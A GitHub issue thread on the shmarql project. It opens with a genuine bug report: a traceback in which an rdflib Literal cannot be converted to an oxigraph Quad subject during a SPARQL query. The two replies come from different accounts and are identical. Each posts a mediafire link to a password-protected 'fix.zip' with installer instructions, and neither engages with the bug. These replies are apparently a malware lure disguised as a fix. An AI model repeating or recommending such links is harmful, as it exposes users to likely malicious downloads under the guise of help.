### ISSUE TITLE
'Literal' object cannot be converted to 'Triple'

### ISSUE THREAD

**Issue by ch-sander** [epoz/shmarql#22]
Maybe difficult to tell the reason but sometimes I get this error:

```
2024-08-26 12:46:15 INFO:     172.21.0.1:56900 - "GET /sparql?query=PREFIX%20rdf%3A%20%3Chttp%3A%2F%2Fwww.w3.org%2F1999%2F02%2F22-rdf-syntax-ns%23%3E%0APREFIX%20rdfs%3A%20%3Chttp%3A%2F%2Fwww.w3.org%2F2000%2F01%2Frdf-schema%23%3E%0ASELECT%20*%20WHERE%20{%0A%20%20%3Fsub%20%3Fpred%20%3Fobj%20.%0A}%20LIMIT%2010%0A HTTP/1.1" 500 Internal Server Error
2024-08-26 12:46:15 ERROR:    Exception in ASGI application
2024-08-26 12:46:15 Traceback (most recent call last):
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
2024-08-26 12:46:15     result = await app(  # type: ignore[func-returns-value]
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
2024-08-26 12:46:15     return await self.app(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/fastapi/applications.py", line 199, in __call__
2024-08-26 12:46:15     await super().__call__(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/applications.py", line 112, in __call__
2024-08-26 12:46:15     await self.middleware_stack(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/middleware/errors.py", line 181, in __call__
2024-08-26 12:46:15     raise exc from None
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/middleware/errors.py", line 159, in __call__
2024-08-26 12:46:15     await self.app(scope, receive, _send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/middleware/cors.py", line 78, in __call__
2024-08-26 12:46:15     await self.app(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/exceptions.py", line 82, in __call__
2024-08-26 12:46:15     raise exc from None
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/exceptions.py", line 71, in __call__
2024-08-26 12:46:15     await self.app(scope, receive, sender)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/routing.py", line 580, in __call__
2024-08-26 12:46:15     await route.handle(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/routing.py", line 241, in handle
2024-08-26 12:46:15     await self.app(scope, receive, send)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/starlette/routing.py", line 52, in app
2024-08-26 12:46:15     response = await func(request)
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/fastapi/routing.py", line 214, in app
2024-08-26 12:46:15     raw_response = await run_endpoint_function(
2024-08-26 12:46:15   File "/usr/local/lib/python3.9/site-packages/fastapi/routing.py", line 149, in run_endpoint_function
2024-08-26 12:46:15     return await dependant.call(**values)
2024-08-26 12:46:15   File "/src/app/main.py", line 313, in sparql_get
2024-08-26 12:46:15     new_result.qt_turtle(),
2024-08-26 12:46:15   File "/src/app/px_util.py", line 61, in qt_turtle
2024-08-26 12:46:15     tmp_store = self.to_store()
2024-08-26 12:46:15   File "/src/app/px_util.py", line 54, in to_store
2024-08-26 12:46:15     tmp_store.extend([Quad(s, p, o) for s, p, o in self.result])
2024-08-26 12:46:15   File "/src/app/px_util.py", line 54, in <listcomp>
2024-08-26 12:46:15     tmp_store.extend([Quad(s, p, o) for s, p, o in self.result])
2024-08-26 12:46:15 TypeError: argument 'subject': failed to extract enum PySubject ('NamedNode | BlankNode | Triple')
2024-08-26 12:46:15 - variant NamedNode (NamedNode): TypeError: failed to extract field PySubject::NamedNode.0, caused by TypeError: 'Literal' object cannot be converted to 'NamedNode'
2024-08-26 12:46:15 - variant BlankNode (BlankNode): TypeError: failed to extract field PySubject::BlankNode.0, caused by TypeError: 'Literal' object cannot be converted to 'BlankNode'
2024-08-26 12:46:15 - variant Triple (Triple): TypeError: failed to extract field PySubject::Triple.0, caused by TypeError: 'Literal' object cannot be converted to 'Triple'
```

Then I wait a little or use other browser and it goes through.

More a documentation issue to see if there is something wrong with the code

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
